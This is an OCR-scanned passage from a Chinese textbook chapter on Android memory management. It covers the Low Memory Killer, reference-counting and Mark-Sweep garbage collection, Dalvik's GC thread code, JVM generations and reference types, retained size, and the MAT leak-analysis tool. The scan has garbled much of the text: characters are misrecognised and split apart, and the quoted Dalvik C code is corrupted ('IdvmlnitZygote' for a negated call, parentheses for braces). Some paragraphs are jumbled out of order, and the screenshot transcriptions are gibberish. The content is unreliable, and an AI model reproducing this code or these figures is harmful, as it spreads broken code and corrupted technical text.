现 ， 基 于 多 个 标准 来 给 每 个 进程 算 分 ， 分 最 高 的 被 选中 杀 死 。 基 本 上 是 占用 内 存 越 多 、oom_adj RARA 
能 被 选中 。 

由 此 可 以 看 出 ，Android 的 Low Memory Killer 和 标准 的 OOM Killer 的 很 多 思路 是 一 致 的 ， 只 不 过 Low 
Memory Killer 作为 一 个 shrinker 实现 ; 而 OOM Killer 则 在 分 配 内 存 时 被 调用 (如 果 内 存 资源 很 紧张 )。 Android 
的 Low Memory Killer 实现 得 较为 简洁 ， 这 点 从 代码 行 数 就 能 看 到 ， 但 并 不 觉得 比 OOM Killer 更 为 灵活 ， 
只 不 过 是 另 一 种 OOM Killer。 


5.4 常用 的 垃圾 收集 算法 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 5 章 \ 常 用 的 垃圾 收集 算法 .avi 

在 垃圾 回收 算法 技术 中 ， 主 要 有 以 下 3 种 经 典 的 算法 。 

а 引用 计数 算法 。 

口 MarkSweep 算 法 。 

口 SemiSpaceCopy 算 法 。 

其 他 算法 或 者 混合 以 上 3 种 算法 来 使 用 ， 可 以 根据 不 同 的 场合 选择 不 同 的 算法 。 在 本 节 的 内 容 中 ， 将 
简要 讲解 上 述 垃 圾 收集 算法 的 基本 知识 。 


5.4.1 引用 计数 算法 


引用 计数 算法 非常 简单 ,就 是 使 用 一 个 变量 记录 这 块 内 存 或 者 对 象 的 使 用 次 数 。 例 如, 在 COM 技术 中 ， 
就 是 使 用 引用 计数 来 确认 这 个 COM 对 象 什么 时 候 删除 的 。 当 一 个 COM 对 象 给 不 同 线程 来 使 用 时 ， 由 于 不 
同 的 线程 生命 周期 不 一 样 ， 因 此 ， 没 有 办 法 知道 这 个 COM 对 象 到 底 在 哪个 线程 删除 ， 只 能 使 用 引用 计数 来 
删除 ， 否 则 还 需要 在 不 同 线程 之 间 洪 加 同步 机 制 ， 这 样 是 非常 复杂 的 ， 如果 COM 对 象 有 很 多 ， 就 变 成 基本 
上 不 能 实现 了 。 
引用 计数 算法 的 优点 是 : 
О 在 对 象 变 成 垃圾 对 象 时 ， 可 以 马上 进行 回收 ， 回 收效 率 和 成 本 都 是 最 低 的 。 
口 内 存 使 用 率 最 高 ， 基 本 上 没有 时 间 花 费 ， 不 需要 把 所 有 访问 COM 对 象 线程 都 停 下 来 。 
引用 计数 算法 的 缺点 是 : 
о 引用 计数 会 影响 执行 效率 ， 每 引用 一 次 都 需要 更 新 引用 计数 ，COM 对 象 是 人 工控 制 的 ， 因 此 次 数 
很 少 ， 没 有 什么 影响 。 但 是 在 Java 中 是 由 编译 程序 来 控制 的 ， 因 此 引用 次 数 非常 多 。 
O 不 能 解决 交 义 引用 ， 或 者 环形 引用 的 问题 。 例 如 ， 在 一 个 环形 链表 里 ， 每 一 个 元 素 都 引用 前 面 的 元 
素 ， 这 样 首尾 相连 的 链表 ， 当 所 有 元 素 都 变 成 不 需要 时 ， 就 没有 办 法 识别 出 来 ， 并 进行 内 存 回收 。 


5.4.2 Mark Sweep 算法 


该 算法 又 被 称 为 “标记 一 清除 ”算法 ， 依 赖 于 对 所 有 存活 对 象 进行 一 次 全 局 遍历 来 确定 哪些 对 象 可 以 
回收 。 遍 历 的 过 程 从 根 出 发 ， 找 到 所 有 可 到 达 对 和 象 ， 其 他 不 可 到 达 的 对 象 就 是 垃圾 对 象 ， 可 被 回收 。 正 如 
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其 名 称 所 暗示 的 那样 ， 这 个 算法 分 为 两 大 阶段 : 标记 和 清除 。 这 种 分 步 执行 的 思路 构成 了 现代 垃圾 收集 算 
法 的 思想 基础 。 与 引用 计数 算法 不 同 的 是 ，“ 标 记 一 清除 ”算法 不 需要 监测 每 一 次 内 存 分 配 和 指针 操作 ， 
只 需要 在 标记 阶段 进行 一 次 统计 即 可 。 该 算法 可 以 非常 自然 地 处 理 环形 问题 ， 另 外 在 创建 对 象 和 销毁 对 象 
时 少 了 操作 引用 计数 值 的 开销 。 不 过 ，“ 标 记 一 清除 ”算法 也 有 一 个 缺点 ， 就 是 需要 标记 和 清除 阶段 中 把 
所 有 对 象 停止 执行 。 在 垃圾 回收 器 运行 过 程 中 ， 应 用 程序 必须 暂时 停止 ， 并 等 到 垃圾 回收 器 全 部 运行 完成 
后 ， 才 能 重新 启动 应 用 程序 运行 。 

Dalvik 虚拟 机 最 常用 的 算法 便 是 Mark Sweep 算法 , 该 算法 一 般 分 Mark 阶段 (标记 出 活动 对 象 ), Sweep 
阶段 (回收 垃圾 内 存 ) 和 Concurrent Mark 阶段 (减少 堆 中 的 碎片 ).Dalvik 虚拟 机 的 实现 不 进行 可 选 的 Compact 
阶段 。 

(1) Mark 阶段 

垃圾 收集 的 第 一 步 是 标记 出 活动 对 象 ， 因 为 没有 办 法 识别 那些 不 可 访问 的 对 象 (unreachableobjects) , 
因此 只 能 标记 出 活动 对 象 ， 这 样 所 有 未 被 标记 的 对 象 就 是 可 以 回收 的 垃圾 。 

О 根 集合 (RootSet) 

当 进行 垃圾 收集 时 ， 需 要 停止 Dalvik 虚拟 机 的 运行 (当然 ， 除 了 垃圾 收集 之 外 ) 。 因 此 垃圾 收集 又 被 称 
做 STW (stop-the-world， 整 个 世界 因 我 而 停止 ) Dalvik 虚拟 机 在 运行 过 程 中 要 维护 一 些 状态 信息 ， 这 些 信 
息 包 括 每 个 线程 所 保存 的 寄存 器 、Java 类 中 的 静态 字段 、 局 部 和 全 局 的 INI 引用，JVM 中 的 所 有 函数 调用 会 
对 应 一 个 相应 的 栈 帧 。 每 一 个 栈 帧 里 可 能 包含 对 对 象 的 引用 ， 例 如 ， 包 含 对 象 引用 的 局 部 变量 和 参数 。 

所 有 这 些 引用 信息 被 加 入 到 一 个 集合 中 ， 称 为 根 集合 。 然 后 从 根 集合 开始 ， 递 归 的 查找 可 以 从 根 集合 
出 发 访问 对 象 。 因 此 ，Mark 过 程 又 被 称 为 追踪 ， 追 踪 所 有 可 被 访问 的 对 象 。 如 图 5-2 所 示 ， 假 定 从 根 集合 
{а} 开始， 可 以 访问 的 对 象 集合 为 fab,c,d}， 这 样 就 追踪 出 所 有 可 被 访问 的 对 象 集合 。 
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图 5-2 Mark 过 程 


О 标记 栈 (MarkStack) 

垃圾 收集 使 用 栈 来 保存 根 集合 ， 然 后 对 栈 中 的 每 一 个 元 素 递归 追踪 所 有 可 访问 的 对 象 ， 对 于 所 有 可 访 
问 的 对 象 ， 在 markBits 位 图 中 将 该 对 象 的 内 存 起 始 地 址 对 应 的 位 设 为 1。 这 样 当 栈 为 宝 时 ，markBits 位 图 就 
是 所 有 可 访问 的 对 象 集合 。 

(2) Sweep 阶段 

垃圾 收集 的 第 二 步 就 是 回收 内 存 ， 在 Mark 阶段 通过 markBits 位 图 可 以 得 到 所 有 可 访问 的 对 象 集合 ， 而 
liveBits 位 图 表示 所 有 已 经 分 配 的 对 象 集合 。 因 此 通过 比较 这 liveBits 位 图 和 markBits 位 图 ， 其 差异 就 是 所 
有 可 回收 的 对 象 集合 。Sweep 阶段 调用 free 来 释放 这 些 内 存 给 堆 。 

(3) Concurrent Mark 〈 并 发 标记 ) 

为 了 运行 垃圾 收集 ， 需 要 停止 虚拟 机 的 运行 ， 这 可 能 会 导致 程序 比较 长 时 间 的 停顿 。 垃 圾 收集 的 主要 
工作 位 于 Mark 阶段 ，Dalvik 虚拟 机 使 用 了 Concurrent Mark 技术 以 缩短 停顿 时 间 。 在 Concurrent Mark 中 引 
入 一 个 单独 的 gc 线程 , 由 该 线程 去 跟踪 自己 的 根 集合 中 所 有 可 访问 的 对 象 , 同时 所 有 其 他 的 线程 也 在 运行 。 
这 也 是 Concurrent 一 词 的 含义 。 但 是 为 了 回收 内 存 ， 即 运行 Sweep 阶段 ， 必 须 停 止 虚拟 机 的 运行 。 这 会 导 
入 一 个 问题 ， 即 在 gc 线程 mark 对 象 时 ， 其 他 线程 的 运行 又 引入 了 新 的 访问 对 象 。 因 此 在 Sweep 阶段 又 重 
新 运行 mark 阶段 ， 但 是 在 这 个 阶段 对 于 已 经 mark 的 对 象 来 说 ， 可 以 不 用 继续 递归 追踪 了 ， 这 样 从 一 定 程 


度 上 降低 了 程序 的 停顿 时 间 。 
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5.4.3 ”垃圾 回收 的 时 机 


Android 有 两 种 垃圾 回收 的 方式 ， 一 种 是 虚拟 机 线程 自动 进行 的 ， 一 种 是 手动 进行 的 。 自 动 方式 是 虚拟 
机 创建 一 个 线程 ， 这 个 线程 定时 进行 。 虚 拟 机 在 初始 化 时 就 创建 这 个 线程 ， 例 如 下 面 的 代码 。 

if(gDvm.zygote)( 

if(IdvmlnitZygote()) 

gotofail; 

} else( 

if(IdvmlnitAfterZygote()) 

gotofail; 

} 

在 上 述 代 码 中 调用 了 函数 dvmInitAfterZygote()， 此 函数 中 会 调用 函数 dvmSignalCatcherStartup() 来 创建 
垃圾 回收 线程 。 函 数 dvmlnitAfterZygote() 的 具体 实现 代码 如 下 所 示 。 

bool dvmlnitAfterZygote(void) 

{ 


u8 startHeap, startQuit, startJdwp; 
u8 endHeap, endQuit endJdwp; 
startHeap = dvmGetRelativeTimeUsec(); 
"n 
* Post-zygote heap initialization, including starting 
* the HeapWorker thread 
*/ 
if (IdvmGcStartupAfterZygote()) 
return false; 
endHeap = dvmGetRelativeTimeUsec(); 
startQuit = dvmGetRelative TimeUsec(); 
/* start signal catcher thread that dumps stacks on SIGQUIT */ 
if (IgDvm.reduceSignals && !gDvm.noQuitHandler) ( 
if (IdvmSignalCatcherStartup()) 
return false; 
} 
/* start stdout/stderr copier, if requested */ 
if (gDvm.logStdio) ( 
if (IdvmStdioConverterStartup()) 
return false; 
) 
endQuit = dvmGetRelative TimeUsec(); 
startJdwp = dvmGetRelativeTimeUsec(); 
А 
* Start JDWP thread. If the command-line debugger flags specified 
* "suspend-y", this will pause the VM. We probably want this to 
* come last 
ч 
if (IdvmInitJDWP()) { 
LOGD("JDWP init failed; continuing anyway\n"); 
} 
endJdwp = dvmGetRelativeTimeUsec(); 
LOGV("thread-start heap=%d quit=%d jdwp=%d total=%d usecln", 
(int)(endHeap-startHeap), (int)(endQuit-startQuit), 
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(int)(endJdwp-startJdwp), (int)(endJdwp-startHeap)); 
#ifdef WITH_JIT 
if (gDvm.executionMode == kExecutionModeJit) { 
if (\dvmCompilerStartup()) 


return false; 
} 
#endif 
return true; 


} 

函数 dvmSignalCatcherStartup() 的 实现 代码 如 下 所 示 。 
bool dvmSignalCatcherStartup(void) 

{ 

gDvm.haltSignalCatcher= false; 
if(IdymCreatelnternalThread(&gDvm.signalCatcherHandle, 
"SignalCatcher", signalCatcherThreadStart,NULL)) 
returnfalse; 

returntrue; 


) 

通过 上 面 的 这 段 代 码 ， 就 可 以 看 到 线程 运行 函数 是 signalCatcherThreadStart()， 在 这 个 函数 中 会 调用 函 
数 dvmCollectGarbage0 来 进行 垃圾 回收 。 函 数 dvmCollectGarbage() 的 具体 实现 代码 如 下 所 示 。 

void dvmCollectGarbage(bool collectSoftReferences) 

{ 

dvmLockHeap(); 

LOGVV("ExplicitGC\n"); 

dvmCollectGarbagelnternal(collectSoftReferences); 

dvmUnlockHeap(); 


} 

此 函数 主要 通过 锁 来 锁 住 多 线程 访问 的 堆 空间 相关 对 象 ， 然 后 直接 就 调用 函数 dvmCollectGarbage- 
Internal(0) 来 进行 垃圾 回收 过 程 ， 也 就 调用 上 面 标记 删除 算法 的 函数 。 

另 一 种 方式 通过 调用 运行 库 的 gc 来 回收 ， 例 如 下 面 的 代码 : 

staticvoidDalvik java lang Runtime gc(constu4* args,JValue*pResult) 


T 

UNUSED PARAMETER(args); 
dvmCollectGarbage(false); 
RETURN VOID(); 


) 
此 处 也 是 调用 了 函数 dvmCollectGarbage() 来 进行 垃圾 回收 。 手 动 的 方式 适合 当 需 要 内 存 , 但 线程 又 没有 
调用 时 进行 。 


5.5 Android 的 内 存 泄 漏 


Ба 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 5 章 \Android 的 内 存 泄漏 .avi 

虽然 Dalvik VM 支持 垃圾 收集 ， 但 是 这 并 不 意味 着 可 以 不 用 关心 内 存 管 理 ， 反 而 更 应 该 注意 移动 设备 
的 内 存 使 用 ， 毕 竞 其 内 存 空间 是 受到 限制 的 。 在 实际 应 用 中 ， 一 些 内 存 使 用 问题 是 很 明显 的 ， 例 如 ， 在 每 
次 用 户 触摸 屏幕 时 如 果 应 用 程序 有 内 存 泄 漏 ， 将 有 可 能 触发 OutOfMemoryError， 最 终 会 导致 程序 崩溃 。 另 
外 一 些 问 题 却 很 微妙 ， 也 许 只 是 降低 应 用 程序 和 整个 系统 的 性 能 〈 当 高 频率 和 长 时 间 地 运行 垃圾 收集 器 的 


1.8) 


时 候 ) 。 在 本 节 
5.5.1 什么 是 内 存 泄漏 


的 内 容 中 ， 将 详细 讲解 Android 系统 的 内 存 泄漏 问题 。 


PY feta EH 


理 上 的 消失 ， 而 


于 玖 忽 或 错误 造成 程序 未 能 释放 已 经 不 再 使 用 的 内 存 的 情况 。 内 存 泄漏 并 非 指 内 存在 物 
是 应 用 程序 分 配 某 段 内 存 后 ， 由 于 设计 错误 ， 导 致 在 释放 该 段 内 存 之 前 就 失去 了 对 该 段 内 


存 的 控制 ， 从 而 造成 了 内 存 的 浪费 。 内 存 泄漏 与 许多 其 他 问题 有 着 相似 的 症状 ， 并 且 通 常情 况 下 只 能 由 那 


些 可 以 获得 程序 
描述 为 内 存 泄漏 
机 的 性 能 。 最 终 
应 用 程序 崩溃 。 

内 存 泄漏 可 


源 代码 的 程序 员 才 可 以 分 析出 来 。 然 而 ， 有 不 少 人 习惯 于 把 任何 不 需要 的 内 存 使 用 的 增加 
， 即 使 严格 意义 上 来 说 这 是 不 准确 的 。 内 存 泄 漏 会 因为 减少 可 用 内 存 的 数量 从 而 降低 计算 
， 在 最 糟糕 的 情况 下 ， 过 多 的 可 用 内 存 被 分 配 掉 导致 全 部 或 部 分 设备 停止 正常 工作 ， 或 者 


能 不 严重 ， 甚 至 能 够 被 常规 的 手段 检测 出 来 。 在 现代 操作 系统 中 ， 一 个 应 用 程序 使 用 的 常 


规 内 存在 程序 终止 时 被 释放 。 这 表示 一 个 短暂 运行 的 应 用 程序 中 的 内 存 泄漏 不 会 导致 严重 后 果 。 


在 以 下 情况 


中 ， 内 存 泄漏 将 导致 较 严重 的 后 果 。 


а 程序 运行 后 对 其 置之不理 , 并 且 随 着 时 间 的 流失 消耗 越 来 越 多 的 内 存 。 例 如, 服务 器 上 的 后 台 任 务 ， 
尤其 是 嵌入 式 系统 中 的 后 台 任务 ， 这 些 任务 可 能 运行 后 长 时 间 不 被 处 理 。 


内 存 非 


OOOOOO 


新 的 内 存 被 频繁 地 分 配 ， 例 如 ， 当 显示 计算 机 游戏 或 动画 视频 画面 时 。 

程序 能 够 请 求 未 被 释放 的 内 存 ， 例 如 共享 内 存 ， 甚 至 是 在 程序 终止 时 。 

汇 漏 在 操作 系统 内 部 发 生 。 

泄漏 在 系统 关键 驱动 中 发 生 。 

常 有 限 ， 例 如 ， 在 嵌入 式 系统 或 便携 设备 中 。 

当 运行 于 一 个 终止 时 内 存 并 不 自动 释放 的 操作 系统 〈 例 如 AmigaOS) 之 上 ， 而 且 一 旦 丢失 只 能 通过 


重启 来 恢复 。 
55.2 ”为 什么 会 发 生 内 存 泄漏 


JVM 会 根据 generation ÝR) 来 进行 GC (对 象 引 用 ) ,如 图 5-3 所 示 ， 分 为 young generation (年 轻 代 ) 、 


tenured generatio 


ME) 是 一 个 异类 


绝 大 多 数 的 


n〔 老 年 代 ) 、permanent generation (perm gen， 永 久 代 ) 。perm gen (或 称 Non-Heap， 非 
。 注 意 ，heap 空间 不 包括 perm gen。 


图 5-3 JVM 根据 generation (10) 来 进行 GC 


对 象 都 在 young generation 被 分 配 ， 也 在 young generation 被 收回 。 当 young generation 的 空 


间 被 填 满 时 ，GC 会 进行 minor collection 〈 次 回收 》， 这 样 的 次 回收 不 涉及 heap 中 的 其 他 generation. minor 
collection 会 根据 weak generational hypothesis( 弱 年 代 假设 ) 来 假设 young generation 中 大 量 的 对 象 都 是 垃圾 


ase sapenne ШП 


需要 回收 ，minor collection 的 过 程 会 非常 快 。 在 young generation 中 ， 没 有 被 回收 的 对 象 被 转移 到 tenured 
generation， 然 而 tenured generation 也 会 被 填 满 ， 最 终 触发 major collection 〈 主 回收 ) ， 这 次 回收 针对 整个 
heap， 由 于 涉及 大 量 对 象 ， 所 以 比 minor collection 慢 得 多 。 
JVM 有 如 下 3 种 垃圾 回收 器 。 
口 throughput collector: 用 来 做 并 行 young generation 回 收 ， 由 参数 -XX:+UseParallelGC 启 动 。 
0 concurrent low pause collector: 用 来 做 tenured generation 并 发 回收 ， 由 参数 -XX:+UseConcMarkSweep 
GC 启 动 。 
0 incremental low pause collector: 是 默认 的 垃圾 回收 器 。 不 建议 直接 使 用 某 种 垃圾 回收 器 , 最 好 让 JVM 
自己 判断 ， 除 非 有 是 够 的 把 握 。 
Heap 中 各 generation 空间 是 如 何 划分 的 呢 ? 通过 JVM 的 -Xmx=n 参数 可 指定 最 大 heap 空间 , 而 -Xms=n 
则 可 指定 最 小 heap 空间 。 在 ТУМ 初始 化 时 ， 如 果 最 小 heap 空间 小 于 最 大 heap 空间 ， 如 图 5-3 所 示 ，JVM 
会 把 未 用 到 的 空间 标注 为 Virtual。 除 了 这 两 个 参数 ， 还 有 -XX:MinHeapFreeRatio=n 和 -XX:MaxHeapFree- 
Ratio-n 来 分 别 控制 最 大 、 最 小 的 剩余 空间 与 活动 对 象 的 比例 。 在 32 位 Solaris SPARC 操作 系统 下 ， 默 认 值 
ШЖ 5-1 所 示 ， 在 32 位 Windows XP 操作 系统 下 ， 默 认 值 也 相差 不 多 。 


表 5-1 各 个 参数 的 默认 值 


由 于 tenured generation 的 major collection 过 程 较 慢 ， 所 以 如 果 tenured generation 空间 小 于 young 
generation， 会 造成 频繁 的 major collection， 影 响 效率 。Server JVM 默认 的 young generation 和 tenured generation 
室 间 比例 为 1 : 2, 也 就 是 说 young generation 的 eden 和 survivor 空间 之 和 是 整个 heap( 当然 不 包括 perm gen) 
的 3， 该 比例 可 以 通过 -XX:NewRatio=n 参数 来 控制 ， 而 Client JVM 默认 的 -XX:NewRatio 是 8。 

young generation 中 幸存 的 对 和 象 被 转移 到 tenured generation， 但 是 concurrent collector 线程 在 这 里 进行 
major collection， 而 在 回收 任务 结束 前 空间 被 耗 尽 了 ， 这 时 将 会 发 生 Full Collections (Full GC) ， 整 个 应 用 
程序 都 会 停止 下 来 直到 回收 完成 。 由 此 可 见 ，Full GC 是 高 负载 生产 环境 的 懂 梦 。 

在 此 还 需要 介绍 一 下 异类 perm gen， 它 是 JVM 用 来 存储 无 法 在 Java 语言 级 描述 的 对 象 ， 这 些 对 象 分 别 
是 类 和 方法 数据 (与 class loader 有 关 ) 以 及 interned strings (字符 串 驻 留 ) 。 一 般 32 位 OS 下 perm gen $R 
认 64m， 可 通过 参数 -XX:MaxPermSize=n 指定 。 

接 下 来 回 到 本 小 节 的 问题 : 为 何 会 内 存 溢 出 ? 要 回答 这 个 问题 又 要 引出 另外 一 个 话题 ， 即 什么 样 的 对 
象 GC 才 会 回收 ? 当然 是 GC 发 现 通过 任何 reference chain (引用 链 ) 无 法 访问 某 个 对 象 时 ， 该 对 象 即 被 回 
收 。 名 词 GC Roots 正 是 分 析 这 一 过 程 的 起 点 ， 例 如 ，JVM 自己 确保 了 对 象 的 可 到 达 性 〈 那 么 JVM 就 是 GC 
Roots) ， 所 以 GC Roots 就 是 这 样 在 内 存 中 保持 对 象 可 到 达 性 的 ， 一 旦 不 可 到 达 ， 即 被 回收 。 通 常 GC Roots 
是 一 个 在 current thread (当前 线程 ) 的 call stack〈 调 用 栈 ) 上 的 对 象 〈 如 方法 参数 和 局 部 变量 ) ， 或 者 是 线 
程 自 身 , 或 者 是 system class loader (系统 类 加 载 器 ) 加 载 的 类 以 及 native code (本 地 代码 ) 保留 的 活动 对 象 。 
所 以 GC Roots 是 分 析 对 象 为 何 还 存活 于 内 存 中 的 利器 。 

从 最 强 到 最 弱 ， 不 同 的 引用 《〈 可 到 达 性 ) 级 别 反映 了 对 象 的 生命 周期 。 

О Strong Ref 〈 强 引用 ) : 通常 我 们 编写 的 代码 都 是 Strong Ref， 与 此 对 应 的 是 强 可 达 性 ， 只 有 去 掉 强 

可 达 ， 对 象 才 被 回收 。 

О Soft Ref〈 软 引用 ) : 对 应 软 可 达 性 ， 只 要 有 足够 的 内 存 ， 就 一 直 保持 对 象 ， 直 到 发 现 内 存 吃 紧 且 

没有 Strong Ref 时 才 回收 对 象 。 一 般 可 用 来 实现 缓存 ， 通 过 java.lang.refSoftReference 类 实现 。 


© 


егез 


О Weak Ref ( 弱 引用 ) : 比 Soft Ref 更 弱 ， 当 发 现 不 存在 Strong Ref 时 ， 立 刻 回 收 对 象 而 不 必 等 到 内 存 
吃紧 的 时 候 。 通 过 java.lang.ref WeakReference 和 java.util.WeakHashMap 类 实现 。 

Q Phantom Ref〈 虚 引用 ) : 根本 不 会 在 内 存 中 保持 任何 对 象 ， 只 能 使 用 Phantom Ref 本 身 。 一 般 用 于 
在 进入 finalize() 方 法 后 进行 特殊 的 清理 过 程 ， 通 过 java.lang.ref.PhantomReference 实 现 。 


5.5.3 shallow size. retained size 


shallow size 是 指 对 象 本 身 占用 内 存 的 大 小 ， 不 包含 对 其 他 对 象 的 引用 ， 也 就 是 对 象 头 加 成 员 变 量 CA 
是 成 员 变量 的 值 ) 的 总 和 。 在 32 位 系统 上 ， 对 象 头 占用 S 字 节 ，int 占用 4 字 节 ， 成 员 变量 〈 对 象 或 数组 ) 
不 管 是 否 引用 了 其 他 对 象 〈 实 例 ) 或 者 赋值 为 null， 始 终 占 用 4 字 节 。 所 以 ， 对 于 String 对 象 实例 来 说 ， 有 
3 个 int 成 员 (3*4=12 字 节 )、 一 个 char[ ] 成 员 (1*4=4 F) 以 及 一 个 对 象 头 (8 字 节 ) ,总共 3*4 +1*4+8=24 
字 节 。 根 据 这 一 原则 ， 对 String а= “rosen jiang” 来 说 ， 实 例 a 的 shallow size 也 是 24 字 节 。 

retained size 是 指 该 对 象 自己 的 shallow size, 加 上 从 该 对 象 能 直接 或 间接 访问 到 对 象 的 shallow size 之 和 。 
换 句 话说 ，retained size 是 该 对 象 被 GC 之 后 所 能 回收 到 内 存 的 总 和 。 为 了 更 好 地 理解 retained size， 不 妨 看 

-个 例子 。 

把 内 存 中 的 对 象 看 成 图 5-4 中 的 节点 ,并 且 对 象 和 对 象 之 间 互 相 引用 。 这 里 有 一 个 特殊 的 节点 GC Roots, 

这 就 是 reference chain 的 起 点 。 


图 5-4 节点 图 


利用 Strong Ref 存储 大 量 数 据 ， 直 到 heap 撑 破 ， 利 用 interned strings (或 者 class loader 加 载 大 量 的 类 ) 把 
perm gen 撑 破 。 在 图 5-4 中 ， 从 objl 入 手 ， 深 色 节 点 代表 仅仅 只 有 通过 objl 才能 直接 或 间接 访问 的 对 象 。 因 为 
可 以 通过 GC Roots 访问 ， 所 以 左 图 的 obj3 不 是 深 色 节点 ; 而 在 右 图 却 是 深 色 ， 因 为 它 已 经 被 包含 在 retained Ж 
合 内 。 所 以 对 于 图 5-4 中 来 说 左 图 , objl 的 retained size 是 obj1. obj2. obj4 的 shallow size 总 和 ; 而 右 图 的 retained 
size 是 objl. obj2. obj3. obj4 的 shallow size 总 和 。obj2 的 retained size 可 以 通过 相同 的 方式 计算 。 


5.5.4 查看 Android 内 存 泄漏 的 工具 一 一 MAT 
在 开发 应 用 过 程 中 ， 可 以 使 用 现成 的 工具 来 查看 内 存 泄漏 情况 ， 例 如 DDMS 和 MAT。 有 关 DDMS 的 
知识 在 本 章 前 面 的 内 容 中 已 经 介绍 过 了 ， 接 下 来 将 讲解 MAT 工具 的 基本 知识 。 


MAT (Memory Analyzer Tool) 是 一 个 Eclipse 插件 ， 同 时 也 有 单独 的 КСР 客户 端 。 笔 者 使 用 的 是 MAT 
的 Eclipse 插件 ， 使 用 插件 要 比 RCP 稍微 方便 一 些 。 下 载 后 的 目录 结构 如 图 5-5 所 示 。 
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图 5-5 MAT 的 文件 目录 
双击 图 5-5 中 的 MemoryAnalyzer.exe 可 以 打开 MAT， 打 开 后 的 界面 如 图 5-6 所 示 。 


图 5-6 打开 MAT 后 的 界面 


这 样 通过 图 5-6 中 的 “File” 菜 单 可 以 打开 用 DDMS 生成 的 .hprof 文件 ， 具 体 生成 .hprof 文件 的 方法 请 
读者 参阅 本 章 5.5.5 节 中 的 内 容 。 例 如 ， 打 开 一 个 .hprof 文件 后 的 界面 如 图 5-7 所 示 。 


uswa 
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图 5-7 分 析 界 面 


еее 


МИ 5-5 中 可 以 看 到 MAT 的 大 部 分 功能 ， 有 具体 说 明 如 下 。 
(1) Histogram: 可 以 列 出 内 存 中 的 对 象 、 对 象 的 个 数 以 及 大 小 。 
(2) Dominator Tree: 可 以 列 出 线程 ， 以 及 线程 下 面 的 对 象 占用 的 空间 。 
(3) Top Consumers: 通过 图 形 列 出 最 大 的 object. 
(4) Leak Suspects: 通过 МАТ 自动 分 析 泄 漏 的 原因 。 
选择 Histogram 选项 后 的 界面 如 图 5-8 所 示 。 


=} 
i M [ETE 1915-8-45 
Ti |Eb éefenlt ropert org eligen м 
B aen > romam 
Qi > 1,208, 768 
@ en Ime Strine cm am 
Өг sit ia узван 
[yere s жерте 
G jer tang Dit ЕП 
@ jore ang зма таж 
Gu EE 
Q jere eil наше = 1,552, 006 
Ө sre salips core internal registry Yefereneshidsetitat У m sn 
Е interadl.registey.Cenfigu at sesElenwat = enis 
@ ore eclipsa eg зонага) төен rpertPerregibeseri tnde aes 
Q jwe Img e > 2,300, 100 
Q joe ctl втш шу 
Ө изыш. йымайайашу y= 208,300 
Q ore sagi. блл Version Er 
@ Java suit томиб =m 
Ө org «рә sai. iternel-reaalrer.TnportPachagcSpecifitiendagh Pam m 
[Jmm EET 
Ө je vti онаму E 
гөч, жш 
E 
= ar, 100 
25 
@ rg eclipse. si. өөө EET 
тм: 25 of 5,076 entr 


图 5-8 Histogram 界面 


图 5-8 中 主要 选项 的 说 明 如 下 所 示 。 

口 Objects: 类 的 对 象 的 数量 。 

O shallow size: 就 是 对 象 本 身 占用 内 存 的 大 小 ， 不 包含 对 其 他 对 象 的 引用 ， 也 就 是 对 象 头 加 成 员 变 量 
(不 是 成 员 变量 的 值 》 的 总 和 。 

0 retained size: 是 该 对 象 自己 的 shallow size， 加 上 从 该 对 象 能 直接 或 间接 访问 到 对 象 的 shallow size 
ZAM. MAEVE, retained size 是 该 对 象 被 GC 之 后 所 能 回收 到 内 存 的 总 和 。 

选择 dominator tree 选项 后 的 界面 如 图 5-9 所 示 。 
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图 5-9 dominator tree 界面 
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选择 Overview 选项 后 的 界面 如 图 5-10 所 示 。 
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图 5-10. Overview 界面 

单 击 图 5-10 下 方 的 Leak Suspects 超 链接 后 ， 可 以 查看 详细 的 内 存 报表 ， 如 图 5-11 所 示 。 
- = 

~ Leaks = 


> Overview 
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~ 9 Problem Suspect 1 


5-11 Leak Suspects 查看 详细 的 内 存 报表 
5.5.5 ”查看 Android 内 存 泄 漏 的 方法 
在 日 常 应 用 中 ， 通 常 有 如 下 3 种 查看 Android 内 存 泄 漏 的 方法 。 
1. 生成 .hprof 文件 


生成 .hprof 文件 的 方法 有 很 多 ， 而 且 Android 的 不 同 版 本 中 生成 .hprof 的 方式 也 稍 有 差别 ， 各 个 版 本 中 
生成 .prof 文件 的 方法 请 参考 如 下 官方 网 址 。 
http://android.git.kernel.org/?p=platform/dalvik.git;a=blob_plain;f=docs/heapprofiling.html;hb=HEAD 
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下 面 以 2.1 版 本 为 例 ， 具 体 生 成 流程 如 下 所 示 。 
(1) 打开 Eclipse, 切换 到 DDMS 透视 图 ， 同 时 确认 已 经 打开 了 Devices. Heap 和 logcat 视图 。 
(2) 将 手机 设备 连接 到 计算 机 ， 并 确保 使 用 “USB 调试 ”模式 连接 ， 而 不 是 Mass Storage 模式 。 
(3) SERRA, E Devices 视图 中 就 会 看 到 设备 的 序列 号 和 设备 中 正在 运行 的 部 分 进程 。 
(4) 单 击 选中 想 要 分 析 的 应 用 的 进程 ， 在 Devices 视图 上 方 的 一 行 图 标 按钮 中 ， 同 时 选中 Update Heap 
和 Dump HPROF file 两 个 按钮 。 
(5) 这 时 DDMS 工具 将 会 自动 生成 当前 选中 进程 的 .hprof 文件 ， 并 将 其 进行 转换 后 存放 在 sdcard 当中 ， 
如 果 已 经 安装 了 MAT 插件 ， 那 么 此 时 MAT 将 会 自动 被 启用 ， 并 开始 对 .hprof 文件 进行 分 析 。 
在 上 述 流程 中 ,第 (4) 步 和 第 CS) 步 能 够 正常 使 用 的 前 提 是 需要 有 sdcard， 并 且 当 前 进程 有 向 sdcard 
中 写 入 的 权限 (WRITE_EXTERNAL STORAGE) ， 和 否则 不 会 生成 .hprof 文件 。 
在 logcat 中 会 显示 诸如 下 面 的 信息 : 
ERROR/dalvikvm(8574): hprof: can't open /sdcard/com.xxx.hprof-hptemp: Permission denied 
如 果 没 有 sdcard, 或 者 当前 进程 没有 向 sdcard 写 入 的 权限 (如 system_process)， 那 可 以 进行 如 下 第 (6) 
步 操作 。 
(6) 在 当前 程序 中 ， 例 如 ，framework 的 某 些 代码 中 ， 可 以 使 用 android.os.Debug 中 的 如 下 方法 手动 
指定 .hprof 文件 的 生成 位 置 。 
public static void dumpHprofData(String fileName) throws IOException 
例如 : 
xxxButton.setOnClickListener(new View.OnClickListener() { 
public void onClick(View view) 


{ 
android.os.Debug.dumpHprofData("/data/temp/myapp.hprof"); 


m 


} 

